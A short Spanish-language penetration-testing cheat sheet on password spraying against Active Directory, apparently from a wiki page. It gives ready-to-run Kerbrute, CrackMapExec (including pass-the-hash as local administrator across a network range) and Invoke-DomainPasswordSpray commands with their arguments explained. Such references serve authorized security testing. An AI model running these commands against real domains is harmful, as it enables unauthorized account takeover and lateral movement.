Password spraying
Linux/Unix
Kerbrute
kerbrute passwordspray -d <ACME.LOCAL> --dc <IP-address-DC> <path-users> <password>
passwordspray = prueba de una sola contraseña contra una lista de usuarios.
-d = dominio.
--dc = controlador de dominio.
<IP-address-DC> = dirección IP del controlador de dominio.
<path-users> = ruta de archivo con listado de usuarios.
<password> = contraseña.
CrackMapExec
Active Directory
crackmapexec smb <IP-address-DC> -u <path-users> -p <password> | grep +
<IP-address-DC> = dirección IP del controlador de dominio.
-u = usuarios.
<path-users> = ruta de archivo con listado de usuarios.
-p = contraseña.
<password> = contraseña.
Administrador local
crackmapexec smb --local-auth <CIDR> -u administrator -H <hash> | grep +
<CIDR> = Classless Inter-Domain Routing.
<hash> = hash de contraseña del usuario
administrator
.
Windows
DomainPasswordSpray
Invoke-DomainPasswordSpray -Password <password> -OutFile domain-password-spray.txt -ErrorAction SilentlyContinue
Última actualización
¿Te fue útil?